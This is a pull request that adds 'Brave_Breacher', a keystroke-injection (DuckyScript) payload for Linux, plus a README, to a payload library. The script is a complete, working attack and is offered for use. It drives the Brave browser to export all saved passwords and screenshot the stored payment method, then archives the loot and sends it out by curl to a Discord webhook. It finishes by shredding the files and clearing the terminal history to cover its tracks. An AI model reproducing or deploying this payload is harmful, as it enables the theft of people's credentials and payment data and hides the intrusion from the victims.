### PR TITLE
Added: Brave_Breacher

### DIFF
--- a/payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
+++ b/payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
@@ -1,0 +1,115 @@
+REM TITLE: Brave Breacher Linux
+REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
+REM TARGET OS: Linux (tested on Pop!_OS) | Tested on Flatpak version Brave Browser
+REM DESCRIPTION: Brave Breacher is a side channel attack payload that utilizes loops of TAB, arrow directional keys, etc. as well as utilizing Brave settings URL parameters to navigate the Brave Browser. The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method on file. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded and the terminal history is cleared. Additionally, once each phase is completed, the respective windows (the browser/terminal) are closed to obfuscate activity. To work, add Discord webhook to line 103, add user to lines 95/105.
+
+REM Begin attack:
+ATTACKMODE HID
+DELAY 1000
+
+REM Launching Brave Browser:
+INJECT_MOD
+    GUI
+    DELAY 200
+    STRING brav
+    DELAY 100
+    ENTER
+DELAY 500
+
+REM Phase 1, Opening settings menu and inputting arrow key strokes via DOWN loop to access password manager:
+ALT f
+DELAY 100
+VAR $FOO = 10
+    WHILE ( $FOO > 0)
+    DOWN
+    $FOO = ( $FOO - 1 )
+END_WHILE
+ENTER
+DELAY 200
+ENTER
+DELAY 200
+
+REM Password manager is now open.
+REM Utilizing TAB and arrow keys to navigate to password manager settings menu:
+TAB
+TAB
+DOWN
+DELAY 25
+ENTER
+DELAY 200
+
+REM Utilizing TAB/Enter to select "Download file" and download "Brave Passwords.csv" locally to home directory:
+TAB
+TAB
+TAB
+TAB
+ENTER
+DELAY 125
+ENTER
+DELAY 350
+
+REM Phase 2, Navigating to payment method settings:
+VAR $FEE = 5
+    WHILE ( $FEE > 0 )
+    TAB
+    $FEE = ( $FEE -1 )
+END_WHILE
+DELAY 250
+STRINGLN brave://settings/payments
+DELAY 250
+TAB
+TAB
+TAB
+TAB
+TAB
+DELAY 25
+ENTER
+DELAY 25
+ENTER
+DELAY 100
+
+REM Taking screenshot of payment method stored in browser:
+PRINTSCREEN
+DELAY 150
+STRINGLN c
+DELAY 150
+ENTER
+DELAY 150
+
+REM Opening window settings and using DOWN loop to select "close", closing browser to obfuscate that Brave was opened:
+ALT SPACE
+DELAY 200
+VAR $FEE = 8
+    WHILE ( $FEE > 0 )
+    DOWN
+    $FEE = ( $FEE -1 )
+END_WHILE
+ENTER
+
+REM Opening terminal window:
+DELAY 200
+CTRL ALT t
+DELAY 300
+
+REM Moving Brave password file to /Pictures/Screenshots:
+STRINGLN mv 'Brave Passwords.csv' /home/USER/Pictures/Screenshots
+
+REM Changing directory and creating tarball (loot.tar.gz) of all files in Pictures/Screenshots directory:
+STRINGLN cd Pictures/Screenshots
+STRINGLN tar -czf loot.tar.gz *
+    DELAY 75
+
+REM Exfiltrating "loot.tar.gz" via Discord webhook:
+DEFINE WEBHOOK_URL https://discord.com/api/webhooks/PLACE/DISCORD/WEBHOOK
+    STRINGLN curl -X POST -H "Content-Type: multipart/form-data" \
+    STRINGLN -F "file=@/home/USER/Pictures/Screenshots/loot.tar.gz" \
+    STRINGLN -F "content=$ Loot Incoming $" \
+    STRINGLN WEBHOOK_URL
+ 	DELAY 100
+
+REM Shredding all files in directory Pictures/Screenshots, clearing terminal session history, and exiting terminal to obfuscate activity:
+STRINGLN shred -fuz *
+DELAY 50
+STRINGLN history -c
+DELAY 50
+STRINGLN exit

--- a/payloads/library/credentials/Brave_Breacher/README.md
+++ b/payloads/library/credentials/Brave_Breacher/README.md
@@ -1,0 +1,21 @@
+REM TITLE: Brave Breacher Linux
+
+REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
+
+REM TARGET OS: Linux (tested on Pop!_OS) | Tested on Flatpak version Brave Browser
+
+REM DESCRIPTION: Brave Breacher is a side channel attack payload that utilizes loops of TAB, arrow directional keys, etc. as well as utilizing Brave settings URL parameters to navigate the Brave Browser. The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method on file. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded and the terminal history is cleared. Additionally, once each phase is completed, the respective windows (the browser/terminal) are closed to obfuscate activity. To work, add Discord webhook to line 103, add user to lines 95/105.
+
+![BraveBreacher](https://github.com/user-attachments/assets/42e72651-5546-4c43-9028-8d6c636c3598)
+
+![loot](https://github.com/user-attachments/assets/1e56751c-4fd3-4ef1-b8ab-b9bbb25412a0)
+
+![loott](https://github.com/user-attachments/assets/dea742b6-bfac-4cd6-a57e-009b47c60f4f)
+
+```
+name,url,username,password,note
+site1.com,https://site1.com/,user1,pass1,
+site2.com,https://site2.com/,user2,pass2,
+site3.com,https://site3.com/,user3,pass3,
+site4.com,https://site4.com/,site4,pass4,
+```


### PR DESCRIPTION
Added Brave_Breacher payload to: payloads/library/credentials/Brave_Breacher.

Brave_Breacher payload targets the Brave internet browser. It is a side channel attack that copies stored login credentials and stored payment methods, tarballs them, and exfiltrates them via Discord webhook. It then closes all windows, shreds the tarball and other files, and clears terminal history to obfuscate its' activity.